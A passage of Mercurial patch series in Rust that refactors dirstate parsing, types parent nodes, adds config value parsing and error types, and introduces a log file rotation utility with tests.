HgError> { + let mut copies = Vec::new(); + let mut entries = Vec::new(); - let mut curr_pos = PARENT_SIZE * 2; - let parents = DirstateParents { - p1: contents[..PARENT_SIZE].try_into().unwrap(), - p2: contents[PARENT_SIZE..curr_pos].try_into().unwrap(), - }; + let (parents, rest) = DirstateParents::from_bytes(contents) + .map_err(|_| HgError::corrupted("Too little data for dirstate."))?; + contents = rest; + while !contents.is_empty() { + let (raw_entry, rest) = RawEntry::from_bytes(contents) + .map_err(|_| HgError::corrupted("Overflow in dirstate."))?; - while curr_pos < contents.len() { - if curr_pos + MIN_ENTRY_SIZE > contents.len() { - return Err(HgError::corrupted("Overflow in dirstate.")); - } - let entry_bytes = &contents[curr_pos..]; + let entry = DirstateEntry { + state: EntryState::try_from(raw_entry.state)?, + mode: raw_entry.mode.get(), + mtime: raw_entry.mtime.get(), + size: raw_entry.size.get(), + }; + let (paths, rest) = + u8::slice_from_bytes(rest, raw_entry.length.get() as usize) + .map_err(|_| HgError::corrupted("Overflow in dirstate."))?; - let mut cursor = Cursor::new(entry_bytes); - // Unwraping errors from `byteorder` as we’ve already checked - // `MIN_ENTRY_SIZE` so the input should never be too short. - let state = EntryState::try_from(cursor.read_u8().unwrap())?; - let mode = cursor.read_i32::<BigEndian>().unwrap(); - let size = cursor.read_i32::<BigEndian>().unwrap(); - let mtime = cursor.read_i32::<BigEndian>().unwrap(); - let path_len = cursor.read_i32::<BigEndian>().unwrap() as usize; - - if path_len > contents.len() - curr_pos { - return Err(HgError::corrupted("Overflow in dirstate.")); + // `paths` is either a single path, or two paths separated by a NULL + // byte + let mut iter = paths.splitn(2, |&byte| byte == b'\0'); + let path = HgPath::new( + iter.next().expect("splitn always yields at least one item"), + ); + if let Some(copy_source) = iter.next() { + copies.push((path, HgPath::new(copy_source))); } - // Slice instead of allocating a Vec needed for `read_exact` - let path = &entry_bytes[MIN_ENTRY_SIZE..MIN_ENTRY_SIZE + (path_len)]; - - let (path, copy) = match memchr::memchr(0, path) { - None => (path, None), - Some(i) => (&path[..i], Some(&path[(i + 1)..])), - }; - - if let Some(copy_path) = copy { - copies.push((HgPath::new(path), HgPath::new(copy_path))); - }; - entries.push(( - HgPath::new(path), - DirstateEntry { - state, - mode, - size, - mtime, - }, - )); - curr_pos = curr_pos + MIN_ENTRY_SIZE + (path_len); + entries.push((path, entry)); + contents = rest; } Ok((parents, entries, copies)) } @@ -374,7 +354,7 @@ .collect(); assert_eq!( - (parents, state_map, copymap), + (&parents, state_map, copymap), (new_parents, new_state_map, new_copy_map) ) } @@ -452,7 +432,7 @@ .collect(); assert_eq!( - (parents, state_map, copymap), + (&parents, state_map, copymap), (new_parents, new_state_map, new_copy_map) ) } @@ -499,7 +479,7 @@ assert_eq!( ( - parents, + &parents, [( HgPathBuf::from_bytes(b"f1"), DirstateEntry { # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613561093 -3600 # Wed Feb 17 12:24:53 2021 +0100 # Node ID 98a455a62699ace0b2c743a8d3e4fa74f1a2f28e # Parent f88e8ae0aa8fcde5249c0f902f719ce12a36ebaf rust: Make `DirstateParents`’s fields typed `Node`s Instead of plain byte arrays. Differential Revision: https://phab.mercurial-scm.org/D10006 diff --git a/rust/hg-core/src/dirstate.rs b/rust/hg-core/src/dirstate.rs --- a/rust/hg-core/src/dirstate.rs +++ b/rust/hg-core/src/dirstate.rs @@ -6,6 +6,7 @@ // GNU General Public License version 2 or any later version. use crate::errors::HgError; +use crate::revlog::Node; use crate::{utils::hg_path::HgPathBuf, FastHashMap}; use bytes_cast::{unaligned, BytesCast}; use std::collections::hash_map; @@ -21,8 +22,8 @@ #[derive(Debug, PartialEq, Clone, BytesCast)] #[repr(C)] pub struct DirstateParents { - pub p1: [u8; 20], - pub p2: [u8; 20], + pub p1: Node, + pub p2: Node, } /// The C implementation uses all signed types. This will be an issue diff --git a/rust/hg-core/src/dirstate/dirstate_map.rs b/rust/hg-core/src/dirstate/dirstate_map.rs --- a/rust/hg-core/src/dirstate/dirstate_map.rs +++ b/rust/hg-core/src/dirstate/dirstate_map.rs @@ -6,7 +6,7 @@ // GNU General Public License version 2 or any later version. use crate::errors::HgError; -use crate::revlog::node::NULL_NODE_ID; +use crate::revlog::node::NULL_NODE; use crate::{ dirstate::{parsers::PARENT_SIZE, EntryState, SIZE_FROM_OTHER_PARENT}, pack_dirstate, parse_dirstate, @@ -73,8 +73,8 @@ self.non_normal_set = None; self.other_parent_set = None; self.set_parents(&DirstateParents { - p1: NULL_NODE_ID, - p2: NULL_NODE_ID, + p1: NULL_NODE, + p2: NULL_NODE, }) } @@ -367,8 +367,8 @@ }; } else if file_contents.is_empty() { parents = DirstateParents { - p1: NULL_NODE_ID, - p2: NULL_NODE_ID, + p1: NULL_NODE, + p2: NULL_NODE, }; } else { return Err( diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -89,8 +89,8 @@ let mut packed = Vec::with_capacity(expected_size); - packed.extend(&parents.p1); - packed.extend(&parents.p2); + packed.extend(parents.p1.as_bytes()); + packed.extend(parents.p2.as_bytes()); for (filename, entry) in state_map.iter_mut() { let new_filename = filename.to_owned(); @@ -223,8 +223,8 @@ let mut state_map = StateMap::default(); let copymap = FastHashMap::default(); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let expected = b"1234567891011121314100000000000000000000".to_vec(); @@ -254,8 +254,8 @@ let copymap = FastHashMap::default(); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let expected = [ @@ -294,8 +294,8 @@ HgPathBuf::from_bytes(b"copyname"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let expected = [ @@ -334,8 +334,8 @@ HgPathBuf::from_bytes(b"copyname"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let result = @@ -412,8 +412,8 @@ HgPathBuf::from_bytes(b"copyname2"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let result = @@ -458,8 +458,8 @@ HgPathBuf::from_bytes(b"copyname"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let result = diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -85,6 +85,13 @@ } } +impl From<&'_ NodeData> for Node { + #[inline] + fn from(data: &'_ NodeData) -> Self { + Self { data: *data } + } +} + impl fmt::LowerHex for Node { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { for &byte in &self.data { diff --git a/rust/hg-cpython/src/dirstate/dirstate_map.rs b/rust/hg-cpython/src/dirstate/dirstate_map.rs --- a/rust/hg-cpython/src/dirstate/dirstate_map.rs +++ b/rust/hg-cpython/src/dirstate/dirstate_map.rs @@ -24,12 +24,14 @@ NonNormalEntries, NonNormalEntriesIterator, }, dirstate::{dirs_multiset::Dirs, make_dirstate_tuple}, + parsers::dirstate_parents_to_pytuple, }; use hg::{ errors::HgError, + revlog::Node, utils::hg_path::{HgPath, HgPathBuf}, DirsMultiset, DirstateEntry, DirstateMap as RustDirstateMap, - DirstateMapError, DirstateParents, EntryState, StateMapIter, PARENT_SIZE, + DirstateMapError, DirstateParents, EntryState, StateMapIter, }; // TODO @@ -285,10 +287,7 @@ def parents(&self, st: PyObject) -> PyResult<PyTuple> { self.inner(py).borrow_mut() .parents(st.extract::<PyBytes>(py)?.data(py)) - .and_then(|d| { - Ok((PyBytes::new(py, &d.p1), PyBytes::new(py, &d.p2)) - .to_py_object(py)) - }) + .map(|parents| dirstate_parents_to_pytuple(py, parents)) .or_else(|_| { Err(PyErr::new::<exc::OSError, _>( py, @@ -311,9 +310,8 @@ .read(st.extract::<PyBytes>(py)?.data(py)) { Ok(Some(parents)) => Ok(Some( - (PyBytes::new(py, &parents.p1), PyBytes::new(py, &parents.p2)) - .to_py_object(py) - .into_object(), + dirstate_parents_to_pytuple(py, parents) + .into_object() )), Ok(None) => Ok(Some(py.None())), Err(_) => Err(PyErr::new::<exc::OSError, _>( @@ -601,7 +599,7 @@ Option<(PyBytes, PyObject)> ); -fn extract_node_id(py: Python, obj: &PyObject) -> PyResult<[u8; PARENT_SIZE]> { +fn extract_node_id(py: Python, obj: &PyObject) -> PyResult<Node> { let bytes = obj.extract::<PyBytes>(py)?; match bytes.data(py).try_into() { Ok(s) => Ok(s), diff --git a/rust/hg-cpython/src/parsers.rs b/rust/hg-cpython/src/parsers.rs --- a/rust/hg-cpython/src/parsers.rs +++ b/rust/hg-cpython/src/parsers.rs @@ -53,10 +53,7 @@ PyBytes::new(py, copy_path.as_bytes()), )?; } - Ok( - (PyBytes::new(py, &parents.p1), PyBytes::new(py, &parents.p2)) - .to_py_object(py), - ) + Ok(dirstate_parents_to_pytuple(py, parents)) } Err(e) => Err(PyErr::new::<exc::ValueError, _>(py, e.to_string())), } @@ -155,3 +152,12 @@ Ok(m) } + +pub(crate) fn dirstate_parents_to_pytuple( + py: Python, + parents: &DirstateParents, +) -> PyTuple { + let p1 = PyBytes::new(py, parents.p1.as_bytes()); + let p2 = PyBytes::new(py, parents.p2.as_bytes()); + (p1, p2).to_py_object(py) +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613557294 -3600 # Wed Feb 17 11:21:34 2021 +0100 # Node ID d2e61f00ee9dd3933ab6ec737ac927dd4085d7b2 # Parent 98a455a62699ace0b2c743a8d3e4fa74f1a2f28e rust: Introduce a get_bytes_from_os_str utility function It does the same as get_bytes_from_path but takes an `OsStr` instead of a `Path`. The implementation is the same so using either ends up correct but the function name suggests it’s not. Differential Revision: https://phab.mercurial-scm.org/D10007 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -11,7 +11,7 @@ use crate::config::layer::{ ConfigError, ConfigLayer, ConfigParseError, ConfigValue, }; -use crate::utils::files::get_bytes_from_path; +use crate::utils::files::get_bytes_from_os_str; use format_bytes::{write_bytes, DisplayBytes}; use std::env; use std::path::{Path, PathBuf}; @@ -134,8 +134,7 @@ layer.add( section.to_owned(), key.to_owned(), - // `value` is not a path but this works for any `OsStr`: - get_bytes_from_path(value), + get_bytes_from_os_str(value), None, ); self.layers.push(layer) diff --git a/rust/hg-core/src/utils/files.rs b/rust/hg-core/src/utils/files.rs --- a/rust/hg-core/src/utils/files.rs +++ b/rust/hg-core/src/utils/files.rs @@ -17,6 +17,7 @@ use lazy_static::lazy_static; use same_file::is_same_file; use std::borrow::{Cow, ToOwned}; +use std::ffi::OsStr; use std::fs::Metadata; use std::iter::FusedIterator; use std::ops::Deref; @@ -40,8 +41,13 @@ // that's why Vec<u8> is returned. #[cfg(unix)] pub fn get_bytes_from_path(path: impl AsRef<Path>) -> Vec<u8> { + get_bytes_from_os_str(path.as_ref()) +} + +#[cfg(unix)] +pub fn get_bytes_from_os_str(str: impl AsRef<OsStr>) -> Vec<u8> { use std::os::unix::ffi::OsStrExt; - path.as_ref().as_os_str().as_bytes().to_vec() + str.as_ref().as_bytes().to_vec() } /// An iterator over repository path yielding itself and its ancestors. diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -70,8 +70,7 @@ }; let config_args = values_of_global_arg("config") - // `get_bytes_from_path` works for OsStr the same as for Path - .map(hg::utils::files::get_bytes_from_path); + .map(hg::utils::files::get_bytes_from_os_str); let non_repo_config = &hg::config::Config::load(config_args)?; let repo_path = value_of_global_arg("repository").map(Path::new); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613480131 -3600 # Tue Feb 16 13:55:31 2021 +0100 # Node ID 305d74c262ded61002bb02a9cdd740918be31d95 # Parent d2e61f00ee9dd3933ab6ec737ac927dd4085d7b2 rust: Add config parsing support for more value types * Rust `str` (ASCII or UTF-8) * Integer * Byte quantities Differential Revision: https://phab.mercurial-scm.org/D10008 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -15,6 +15,7 @@ use format_bytes::{write_bytes, DisplayBytes}; use std::env; use std::path::{Path, PathBuf}; +use std::str; use crate::errors::{HgResultExt, IoResultExt}; @@ -61,6 +62,32 @@ } } +pub fn parse_byte_size(value: &[u8]) -> Option<u64> { + let value = str::from_utf8(value).ok()?.to_ascii_lowercase(); + const UNITS: &[(&str, u64)] = &[ + ("g", 1 << 30), + ("gb", 1 << 30), + ("m", 1 << 20), + ("mb", 1 << 20), + ("k", 1 << 10), + ("kb", 1 << 10), + ("b", 1 << 0), // Needs to be last + ]; + for &(unit, multiplier) in UNITS { + // TODO: use `value.strip_suffix(unit)` when we require Rust 1.45+ + if value.ends_with(unit) { + let value_before_unit = &value[..value.len() - unit.len()]; + let float: f64 = value_before_unit.trim().parse().ok()?; + if float >= 0.0 { + return Some((float * multiplier as f64).round() as u64); + } else { + return None; + } + } + } + value.parse().ok() +} + impl Config { /// Load system and user configuration from various files. /// @@ -231,16 +258,14 @@ Ok(repo_config) } - /// Returns an `Err` if the first value found is not a valid boolean. - /// Otherwise, returns an `Ok(option)`, where `option` is the boolean if - /// found, or `None`. - pub fn get_option( - &self, + fn get_parse<'config, T: 'config>( + &'config self, section: &[u8], item: &[u8], - ) -> Result<Option<bool>, ConfigParseError> { + parse: impl Fn(&'config [u8]) -> Option<T>, + ) -> Result<Option<T>, ConfigParseError> { match self.get_inner(§ion, &item) { - Some((layer, v)) => match parse_bool(&v.bytes) { + Some((layer, v)) => match parse(&v.bytes) { Some(b) => Ok(Some(b)), None => Err(ConfigParseError { origin: layer.origin.to_owned(), @@ -252,6 +277,50 @@ } } + /// Returns an `Err` if the first value found is not a valid UTF-8 string. + /// Otherwise, returns an `Ok(value)` if found, or `None`. + pub fn get_str( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<&str>, ConfigParseError> { + self.get_parse(section, item, |value| str::from_utf8(value).ok()) + } + + /// Returns an `Err` if the first value found is not a valid unsigned + /// integer. Otherwise, returns an `Ok(value)` if found, or `None`. + pub fn get_u32( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<u32>, ConfigParseError> { + self.get_parse(section, item, |value| { + str::from_utf8(value).ok()?.parse().ok() + }) + } + + /// Returns an `Err` if the first value found is not a valid file size + /// value such as `30` (default unit is bytes), `7 MB`, or `42.5 kb`. + /// Otherwise, returns an `Ok(value_in_bytes)` if found, or `None`. + pub fn get_byte_size( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<u64>, ConfigParseError> { + self.get_parse(section, item, parse_byte_size) + } + + /// Returns an `Err` if the first value found is not a valid boolean. + /// Otherwise, returns an `Ok(option)`, where `option` is the boolean if + /// found, or `None`. + pub fn get_option( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<bool>, ConfigParseError> { + self.get_parse(section, item, parse_bool) + } + /// Returns the corresponding boolean in the config. Returns `Ok(false)` /// if the value is not found, an `Err` if it's not a valid boolean. pub fn get_bool( @@ -317,7 +386,8 @@ let base_config_path = tmpdir_path.join("base.rc"); let mut config_file = File::create(&base_config_path).unwrap(); let data = - b"[section]\nitem=value0\n%include included.rc\nitem=value2"; + b"[section]\nitem=value0\n%include included.rc\nitem=value2\n\ + [section2]\ncount = 4\nsize = 1.5 KB\nnot-count = 1.5\nnot-size = 1 ub"; config_file.write_all(data).unwrap(); let sources = vec![ConfigSource::AbsPath(base_config_path)]; @@ -339,5 +409,13 @@ config.get_all(b"section", b"item"), [b"value2", b"value1", b"value0"] ); + + assert_eq!(config.get_u32(b"section2", b"count").unwrap(), Some(4)); + assert_eq!( + config.get_byte_size(b"section2", b"size").unwrap(), + Some(1024 + 512) + ); + assert!(config.get_u32(b"section2", b"not-count").is_err()); + assert!(config.get_byte_size(b"section2", b"not-size").is_err()); } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613485340 -3600 # Tue Feb 16 15:22:20 2021 +0100 # Node ID bc08c2331f996e5da6cb0adf5e18c08246511db2 # Parent 305d74c262ded61002bb02a9cdd740918be31d95 rust: Add a `ConfigValueParseError` variant to common errors Configuration files are parsed into sections of key/value pairs when they are read, but at that point values are still arbitrary bytes. Only when a value is accessed by various parts of the code do we know its expected type and syntax, so values are parsed at that point. Let’s make a new error type for this latter kind of parsing error, and add a variant to the common `HgError` so that most code can propagate it without much boilerplate. Differential Revision: https://phab.mercurial-scm.org/D10009 diff --git a/rust/hg-core/src/config.rs b/rust/hg-core/src/config.rs --- a/rust/hg-core/src/config.rs +++ b/rust/hg-core/src/config.rs @@ -11,5 +11,5 @@ mod config; mod layer; -pub use config::Config; +pub use config::{Config, ConfigValueParseError}; pub use layer::{ConfigError, ConfigParseError}; diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -9,7 +9,7 @@ use super::layer; use crate::config::layer::{ - ConfigError, ConfigLayer, ConfigParseError, ConfigValue, + ConfigError, ConfigLayer, ConfigOrigin, ConfigValue, }; use crate::utils::files::get_bytes_from_os_str; use format_bytes::{write_bytes, DisplayBytes}; @@ -54,6 +54,16 @@ Parsed(layer::ConfigLayer), } +#[derive(Debug)] +pub struct ConfigValueParseError { + pub origin: ConfigOrigin, + pub line: Option<usize>, + pub section: Vec<u8>, + pub item: Vec<u8>, + pub value: Vec<u8>, + pub expected_type: &'static str, +} + pub fn parse_bool(v: &[u8]) -> Option<bool> { match v.to_ascii_lowercase().as_slice() { b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true), @@ -262,15 +272,19 @@ &'config self, section: &[u8], item: &[u8], + expected_type: &'static str, parse: impl Fn(&'config [u8]) -> Option<T>, - ) -> Result<Option<T>, ConfigParseError> { + ) -> Result<Option<T>, ConfigValueParseError> { match self.get_inner(§ion, &item) { Some((layer, v)) => match parse(&v.bytes) { Some(b) => Ok(Some(b)), - None => Err(ConfigParseError { + None => Err(ConfigValueParseError { origin: layer.origin.to_owned(), line: v.line, - bytes: v.bytes.to_owned(), + value: v.bytes.to_owned(), + section: section.to_owned(), + item: item.to_owned(), + expected_type, }), }, None => Ok(None), @@ -283,8 +297,10 @@ &self, section: &[u8], item: &[u8], - ) -> Result<Option<&str>, ConfigParseError> { - self.get_parse(section, item, |value| str::from_utf8(value).ok()) + ) -> Result<Option<&str>, ConfigValueParseError> { + self.get_parse(section, item, "ASCII or UTF-8 string", |value| { + str::from_utf8(value).ok() + }) } /// Returns an `Err` if the first value found is not a valid unsigned @@ -293,8 +309,8 @@ &self, section: &[u8], item: &[u8], - ) -> Result<Option<u32>, ConfigParseError> { - self.get_parse(section, item, |value| { + ) -> Result<Option<u32>, ConfigValueParseError> { + self.get_parse(section, item, "valid integer", |value| { str::from_utf8(value).ok()?.parse().ok() }) } @@ -306,8 +322,8 @@ &self, section: &[u8], item: &[u8], - ) -> Result<Option<u64>, ConfigParseError> { - self.get_parse(section, item, parse_byte_size) + ) -> Result<Option<u64>, ConfigValueParseError> { + self.get_parse(section, item, "byte quantity", parse_byte_size) } /// Returns an `Err` if the first value found is not a valid boolean. @@ -317,8 +333,8 @@ &self, section: &[u8], item: &[u8], - ) -> Result<Option<bool>, ConfigParseError> { - self.get_parse(section, item, parse_bool) + ) -> Result<Option<bool>, ConfigValueParseError> { + self.get_parse(section, item, "boolean", parse_bool) } /// Returns the corresponding boolean in the config. Returns `Ok(false)` @@ -327,7 +343,7 @@ &self, section: &[u8], item: &[u8], - ) -> Result<bool, ConfigError> { + ) -> Result<bool, ConfigValueParseError> { Ok(self.get_option(section, item)?.unwrap_or(false)) } diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -1,7 +1,8 @@ +use crate::config::ConfigValueParseError; use std::fmt; /// Common error cases that can happen in many different APIs -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum HgError { IoError { error: std::io::Error, @@ -29,6 +30,14 @@ /// The given string is a short explanation for users, not intended to be /// machine-readable. Abort(String), + + /// A configuration value is not in the expected syntax. + /// + /// These errors can happen in many places in the code because values are + /// parsed lazily as the file-level parser does not know the expected type + /// and syntax of each value. + #[from] + ConfigValueParseError(ConfigValueParseError), } /// Details about where an I/O error happened @@ -63,6 +72,7 @@ impl fmt::Display for HgError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { + HgError::Abort(explanation) => write!(f, "{}", explanation), HgError::IoError { error, context } => { write!(f, "{}: {}", error, context) } @@ -72,7 +82,25 @@ HgError::UnsupportedFeature(explanation) => { write!(f, "unsupported feature: {}", explanation) } - HgError::Abort(explanation) => explanation.fmt(f), + HgError::ConfigValueParseError(ConfigValueParseError { + origin: _, + line: _, + section, + item, + value, + expected_type, + }) => { + // TODO: add origin and line number information, here and in + // corresponding python code + write!( + f, + "config error: {}.{} is not a {} ('{}')", + String::from_utf8_lossy(section), + String::from_utf8_lossy(item), + expected_type, + String::from_utf8_lossy(value) + ) + } } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613055071 -3600 # Thu Feb 11 15:51:11 2021 +0100 # Node ID 1f55cd5b292f5223977ccbff02ff6647f9063f2a # Parent bc08c2331f996e5da6cb0adf5e18c08246511db2 rust: Add a log file rotation utility This is ported to Rust from `mercurial/loggingutil.py`. The "builder" pattern is used to make it visible at call sites what the two numeric parameters mean. In Python they might simply by keyword arguments. Differential Revision: https://phab.mercurial-scm.org/D10010 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -137,11 +137,11 @@ fn add_trusted_dir(&mut self, path: &Path) -> Result<(), ConfigError> { if let Some(entries) = std::fs::read_dir(path) - .for_file(path) + .when_reading_file(path) .io_not_found_as_none()? { for entry in entries { - let file_path = entry.for_file(path)?.path(); + let file_path = entry.when_reading_file(path)?.path(); if file_path.extension() == Some(std::ffi::OsStr::new("rc")) { self.add_trusted_file(&file_path)? } @@ -151,8 +151,9 @@ } fn add_trusted_file(&mut self, path: &Path) -> Result<(), ConfigError> { - if let Some(data) = - std::fs::read(path).for_file(path).io_not_found_as_none()? + if let Some(data) = std::fs::read(path) + .when_reading_file(path) + .io_not_found_as_none()? { self.layers.extend(ConfigLayer::parse(path, &data)?) } diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -150,7 +150,8 @@ // `Path::join` with an absolute argument correctly ignores the // base path let filename = dir.join(&get_path_from_bytes(&filename_bytes)); - let data = std::fs::read(&filename).for_file(&filename)?; + let data = + std::fs::read(&filename).when_reading_file(&filename)?; layers.push(current_layer); layers.extend(Self::parse(&filename, &data)?); current_layer = Self::new(ConfigOrigin::File(src.to_owned())); diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -41,11 +41,15 @@ } /// Details about where an I/O error happened -#[derive(Debug, derive_more::From)] +#[derive(Debug)] pub enum IoErrorContext { - /// A filesystem operation for the given file - #[from] - File(std::path::PathBuf), + ReadingFile(std::path::PathBuf), + WritingFile(std::path::PathBuf), + RemovingFile(std::path::PathBuf), + RenamingFile { + from: std::path::PathBuf, + to: std::path::PathBuf, + }, /// `std::env::current_dir` CurrentDir, /// `std::env::current_exe` @@ -109,28 +113,55 @@ impl fmt::Display for IoErrorContext { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { - IoErrorContext::File(path) => path.display().fmt(f), - IoErrorContext::CurrentDir => f.write_str("current directory"), - IoErrorContext::CurrentExe => f.write_str("current executable"), + IoErrorContext::ReadingFile(path) => { + write!(f, "when reading {}", path.display()) + } + IoErrorContext::WritingFile(path) => { + write!(f, "when writing {}", path.display()) + } + IoErrorContext::RemovingFile(path) => { + write!(f, "when removing {}", path.display()) + } + IoErrorContext::RenamingFile { from, to } => write!( + f, + "when renaming {} to {}", + from.display(), + to.display() + ), + IoErrorContext::CurrentDir => write!(f, "current directory"), + IoErrorContext::CurrentExe => write!(f, "current executable"), } } } pub trait IoResultExt<T> { - /// Annotate a possible I/O error as related to a file at the given path. + /// Annotate a possible I/O error as related to a reading a file at the + /// given path. /// - /// This allows printing something like “File not found: example.txt” - /// instead of just “File not found”. + /// This allows printing something like “File not found when reading + /// example.txt” instead of just “File not found”. /// /// Converts a `Result` with `std::io::Error` into one with `HgError`. - fn for_file(self, path: &std::path::Path) -> Result<T, HgError>; + fn when_reading_file(self, path: &std::path::Path) -> Result<T, HgError>; + + fn with_context( + self, + context: impl FnOnce() -> IoErrorContext, + ) -> Result<T, HgError>; } impl<T> IoResultExt<T> for std::io::Result<T> { - fn for_file(self, path: &std::path::Path) -> Result<T, HgError> { + fn when_reading_file(self, path: &std::path::Path) -> Result<T, HgError> { + self.with_context(|| IoErrorContext::ReadingFile(path.to_owned())) + } + + fn with_context( + self, + context: impl FnOnce() -> IoErrorContext, + ) -> Result<T, HgError> { self.map_err(|error| HgError::IoError { error, - context: IoErrorContext::File(path.to_owned()), + context: context(), }) } } diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -29,6 +29,7 @@ pub mod revlog; pub use revlog::*; pub mod config; +pub mod logging; pub mod operations; pub mod revset; pub mod utils; diff --git a/rust/hg-core/src/logging.rs b/rust/hg-core/src/logging.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/logging.rs @@ -0,0 +1,101 @@ +use crate::errors::{HgError, HgResultExt, IoErrorContext, IoResultExt}; +use crate::repo::Vfs; +use std::io::Write; + +/// An utility to append to a log file with the given name, and optionally +/// rotate it after it reaches a certain maximum size. +/// +/// Rotation works by renaming "example.log" to "example.log.1", after renaming +/// "example.log.1" to "example.log.2" etc up to the given maximum number of +/// files. +pub struct LogFile<'a> { + vfs: Vfs<'a>, + name: &'a str, + max_size: Option<u64>, + max_files: u32, +} + +impl<'a> LogFile<'a> { + pub fn new(vfs: Vfs<'a>, name: &'a str) -> Self { + Self { + vfs, + name, + max_size: None, + max_files: 0, + } + } + + /// Rotate before writing to a log file that was already larger than the + /// given size, in bytes. `None` disables rotation. + pub fn max_size(mut self, value: Option<u64>) -> Self { + self.max_size = value; + self + } + + /// Keep this many rotated files `{name}.1` up to `{name}.{max}`, in + /// addition to the original `{name}` file. + pub fn max_files(mut self, value: u32) -> Self { + self.max_files = value; + self + } + + /// Append the given `bytes` as-is to the log file, after rotating if + /// needed. + /// + /// No trailing newline is added. Make sure to include one in `bytes` if + /// desired. + pub fn write(&self, bytes: &[u8]) -> Result<(), HgError> { + let path = self.vfs.join(self.name); + let context = || IoErrorContext::WritingFile(path.clone()); + let open = || { + std::fs::OpenOptions::new() + .create(true) + .append(true) + .open(&path) + .with_context(context) + }; + let mut file = open()?; + if let Some(max_size) = self.max_size { + if file.metadata().with_context(context)?.len() >= max_size { + // For example with `max_files == 5`, the first iteration of + // this loop has `i == 4` and renames `{name}.4` to `{name}.5`. + // The last iteration renames `{name}.1` to + // `{name}.2` + for i in (1..self.max_files).rev() { + self.vfs + .rename( + format!("{}.{}", self.name, i), + format!("{}.{}", self.name, i + 1), + ) + .io_not_found_as_none()?; + } + // Then rename `{name}` to `{name}.1`. This is the + // previously-opened `file`. + self.vfs + .rename(self.name, format!("{}.1", self.name)) + .io_not_found_as_none()?; + // Finally, create a new `{name}` file and replace our `file` + // handle. + file = open()?; + } + } + file.write_all(bytes).with_context(context)?; + file.sync_all().with_context(context) + } +} + +#[test] +fn test_rotation() { + let temp = tempfile::tempdir().unwrap(); + let vfs = Vfs { base: temp.path() }; + let logger = LogFile::new(vfs, "log").max_size(Some(3)).max_files(2); + logger.write(b"one\n").unwrap(); + logger.write(b"two\n").unwrap(); + logger.write(b"3\n").unwrap(); + logger.write(b"four\n").unwrap(); + logger.write(b"five\n").unwrap(); + assert_eq!(vfs.read("log").unwrap(), b"five\n"); + assert_eq!(vfs.read("log.1").unwrap(), b"3\nfour\n"); + assert_eq!(vfs.read("log.2").unwrap(), b"two\n"); + assert!(vfs.read("log.3").io_not_found_as_none().unwrap().is_none()); +} diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,5 +1,5 @@ use crate::config::{Config, ConfigError, ConfigParseError}; -use crate::errors::{HgError, IoResultExt}; +use crate::errors::{HgError, IoErrorContext, IoResultExt}; use 